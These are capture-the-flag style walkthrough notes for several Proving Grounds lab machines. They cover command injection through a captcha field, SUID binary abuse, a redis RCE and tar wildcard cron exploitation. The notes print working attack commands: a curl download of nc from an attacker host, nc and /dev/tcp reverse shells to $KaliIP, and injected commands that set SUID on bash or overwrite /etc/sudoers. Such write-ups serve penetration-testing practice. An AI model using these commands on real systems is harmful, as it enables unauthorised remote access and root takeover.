By googling the error message. it shows that it treats the abc as code. To further test this, first, we try a correct captcha which is 3, it will redirect to Thanks for shopping page. If we enter an incorrect number like 1, it will return “captcha error”. So we try enter 1*1, it show captcha error. If we enter 1*3, it will redirect to Thanks for shopping page, which means it executes the 1*3. Note: You would like to avoid using + like 1+2 because + treats as space in HTTP request. we are able to execute id command

#Transfer our nc to the target machine
cd /usr/bin
python3 -m http.server 80
#At burp, replace the payload to this, download nc output at /tmp then give execute permission
curl+http%3a//$KaliIP/nc+-o+/tmp/nc+%26%26+chmod+%2bx+/tmp/nc
#Execute the /tmp/nc, remember to stop python http server if you want to use port 80
nc -nlvp 80
#At burp, replace the captcha value
/tmp/nc+$KaliIP+80+-e+/bin/bash

PS: because the server is node.js, so we can also use the following reverse shell code

• [PE] find / -perm /4000 2>/dev/null --> log_reader

find /usr/bin/gdb on this machine. Gdb is a very good debugging tools.

#At the target machine
gdb -q /usr/local/bin/log_reader
#In gdb terminal, use list command to list source code, this allow us better understand what the binary does
list

find / -name “log_reader.c” 2>/dev/null ---> We found it at /usr/share/src/log_reader.c After checking src/log_reader.c file, we notice there is no input validation for the file name, as it only checks if .log exists in the file name. In this case, if we input a filename like 1.log&&id, the binary will execute as cat 1.log&&id. Let’s give it a try.

#Method 1
/usr/local/bin/log_reader "1.log;chmod u+s /bin/bash"
/bin/bash -p
#Method 2
/usr/local/bin/log_reader "1.log&&echo 'observer ALL=(root) NOPASSWD: ALL' > /etc/sudoers"
sudo bash

[WDavid404]

Quackerjack (Linux, 2020)

https://viperone.gitbook.io/pentest-everything/writeups/pg-practice/linux/quackerjack

• rConfig 3.9 - 'searchColumn' SQL Injection (https://www.exploit-db.com/exploits/48208) identified this hash as a MD5 and was not able to crack with John using the rockyou.txt --> use online decrypt site (https://www.md5online.org/md5-decrypt.html)
• rConfig 3.9.3 - Authenticated Remote Code Execution (https://www.exploit-db.com/exploits/47982)
• [PE] https://gtfobins.github.io/gtfobins/find/#suid

[WDavid404]

PC (Linux, 2023)

https://medium.com/@0xrave/pc-proving-grounds-practice-walkthrough-7619983c7d63

• port 8000 website --> run reverse shell command: sh -i >& /dev/tcp/$KaliIP/80 0>&1
• [PE] rpc.py is running as root --> exploit (https://www.exploit-db.com/exploits/50983)

[WDavid404]

RPC1 (Linux, 2023)

[WDavid404]

Readys (Linux, 2021)

https://medium.com/@0xrave/readys-proving-grounds-practice-walkthrough-88a3e0e21f62

• Port 80: wordpress plugin exploit: WordPress Plugin Site Editor 1.1.1 - Local File Inclusion (https://www.exploit-db.com/exploits/44340) --> try to read /etc/apache2/sites-enabled/000-default.conf --> the web root is at /var/www/html but cannot read wp-config.php
• Port 6379: redis RCE exploit (https://github.com/Ridter/redis-rce) (we can get the exp.so here https://github.com/n0b0dyCN/redis-rogue-server/blob/master/exp.so) --> require password of admin --> By checking hacktrick , we found that redis password store at redis.conf --> The common location at /etc/redis/redis.conf , we can read the config file via LFI.
• [PE] cat /etc/crontab, we found a cron job run as root to zip * file via tar --> wildcards with tar

  #at target machine
  echo "" > '--checkpoint=1'
  echo "" > '--checkpoint-action=exec=sh payload.sh'
  #then create a payload.sh with below content, you can create on your kali machine and transfer to target machine.
  echo 'alice ALL=(root) NOPASSWD: ALL' > /etc/sudoers
  chmod +x payload.sh
  #wait for the cronjob to run, like a min, then try
  sudo -l
  sudo /bin/bash
  #Root reverse shell gained.